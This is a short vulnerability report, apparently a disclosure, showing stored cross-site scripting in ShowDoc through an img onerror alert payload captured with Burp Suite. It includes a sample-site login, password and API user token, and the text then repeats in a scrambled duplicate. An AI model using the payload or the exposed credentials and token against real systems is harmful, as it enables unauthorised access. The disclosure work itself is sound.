github project address : https://github.com/star7th/showdoc
Log in to the official sample site
https://www.showdoc.com.cn/
example account:2210364486@qq.com
example password:huahua123
The test page has been created, click Edit
enter <img src=x onerror=alert(1)> click save
Use Burpsuite to capture packets
Click to release the package
access https://www.showdoc.com.cn/2195138658520159/9852226478521844 Click to release the package
Crawled the following data packets
So visit https://source.showdoc.com.cn/server/index.php?s=/api/page/info&page_id=9852226478521844&user_token=bb9ced34d72a82a9dfa88563f6ac665ac3e855755324bb622c99ae0f9244b28a&_item_pwd=null
Successful execution of the pop-up window
github project address : https://github.com/star7th/showdoc Log in to the official sample site https://www.showdoc.com.cn/ example account:2210364486@qq.com example password:huahua123
The test page has been created, click Edit
enter 
Use Burpsuite to capture packets
Click to release the package
access 
So visit 
Successful execution of the pop-up window
<img src=x onerror=alert(1)>click savehttps://www.showdoc.com.cn/2195138658520159/9852226478521844Click to release the package Crawled the following data packetshttps://source.showdoc.com.cn/server/index.php?s=/api/page/info&page_id=9852226478521844&user_token=bb9ced34d72a82a9dfa88563f6ac665ac3e855755324bb622c99ae0f9244b28a&_item_pwd=null